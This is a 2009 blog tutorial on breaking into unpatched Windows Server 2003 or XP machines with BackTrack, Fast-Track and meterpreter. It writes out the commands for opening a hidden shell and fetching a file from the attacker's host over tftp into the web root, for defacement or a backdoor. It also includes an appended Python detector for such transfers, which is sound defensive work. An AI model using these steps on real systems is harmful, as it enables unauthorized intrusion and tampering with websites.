Monday, December 7, 2009

How to hack Windows Server 2003 or XP systems

For those not familiar with hacking, it is a concept of exploration and education.
This post is for educational purposes only, and this bug has been patched by the latest Microsoft patches.

A great hacking/exploration tool is BackTrack, which is a Linux distribution, but more on that later...

Found a great video to get started: http://uploads.blip.tv/file/576639

Basic instructions drawn from this and other videos. In this example, the goal is getting into the system in order to add a web page to the target (in this case Windows Server 2003):

1. Log in to BackTrack (startx for the GUI)
2. Start Fast-Track and choose exploit, enter the IP and choose bind.
3. If there are sessions after the attack attempts, then type:
sessions -i 1

Basic syntax:
sessions -i ID

4. To get to a shell from meterpreter, type:
execute -f cmd.exe -c -H -i

5. In another shell, start the BT tftp service and put your file in /tmp

6. Then get the file from the remote host (BT) in the shell via tftp:
tftp -i 192.168.1.101 get /tmp/index.htm c:\inetpub\wwwroot\index.htm

Syntax:
tftp -i SERVER_IP get SOURCE_LOCATION TARGET_LOCATION

Note: it turns out that Windows Server 2003 Service Pack 1 and up has tftp disabled, so only SP0 will allow this trick. If you encounter those servers, you must use another method or start tftp in some manner to transfer the backdoor or whatever you want. In my case I simply used echo to type sample text into a file created by the command, which I called index.html.
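
For defenders, the transfer in step 6 is the most visible part of the procedure: tftp.exe started on a server and writing into the IIS web root. The Python sketch below is an added example, not part of the original post; it assumes process-creation events with command lines are being collected, and the record layout and sample events are constructed for illustration.

```python
import ntpath
import shlex

WEB_ROOT = r"c:\inetpub\wwwroot"  # IIS default web root, the path used in step 6

# Constructed sample process-creation records; the field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "WEB01",
     "cmdline": r"tftp -i 192.168.1.101 get /tmp/index.htm c:\inetpub\wwwroot\index.htm"},
    {"host": "WEB01",
     "cmdline": r'"C:\WINDOWS\system32\TFTP.EXE" -i 10.0.0.5 GET boot.cfg C:\Temp\boot.cfg'},
    {"host": "WEB02",
     "cmdline": r"tftp -i 10.0.0.5 get page.htm C:/Inetpub/WWWRoot/default.htm"},
    {"host": "WS07", "cmdline": "ping 192.168.1.1"},
]


def parse_tftp(cmdline):
    """Parse 'tftp [-i] HOST GET|PUT SOURCE [DEST]'; return a dict or None.

    With no DEST, the file is written under the source's base name.
    """
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("tftp", "tftp.exe"):
        return None
    args = [t for t in tokens[1:] if t.lower() != "-i"]
    if len(args) < 3 or args[1].lower() not in ("get", "put"):
        return None
    dest = args[3] if len(args) > 3 else ntpath.basename(args[2].replace("/", "\\"))
    return {"server": args[0], "verb": args[1].lower(), "source": args[2], "dest": dest}


def under_web_root(path):
    """True if the path, normalised for case, slashes and '..', is in WEB_ROOT."""
    norm = ntpath.normpath(path).lower()
    return norm == WEB_ROOT or norm.startswith(WEB_ROOT + "\\")


def triage(events):
    """Flag every tftp.exe transfer; a 'get' that lands in the web root is high."""
    findings = []
    for ev in events:
        t = parse_tftp(ev["cmdline"])
        if t is None:
            continue
        high = t["verb"] == "get" and under_web_root(t["dest"])
        findings.append({"host": ev["host"], "severity": "high" if high else "medium", **t})
    return findings


if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS), sep="\n")
```

The echo approach mentioned in the note uses a cmd.exe built-in typed into an already running shell, so it creates no new process for this check to see; catching it needs file-change monitoring on the web root.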

Remember to be a White hat hacker and let me know how it goes!
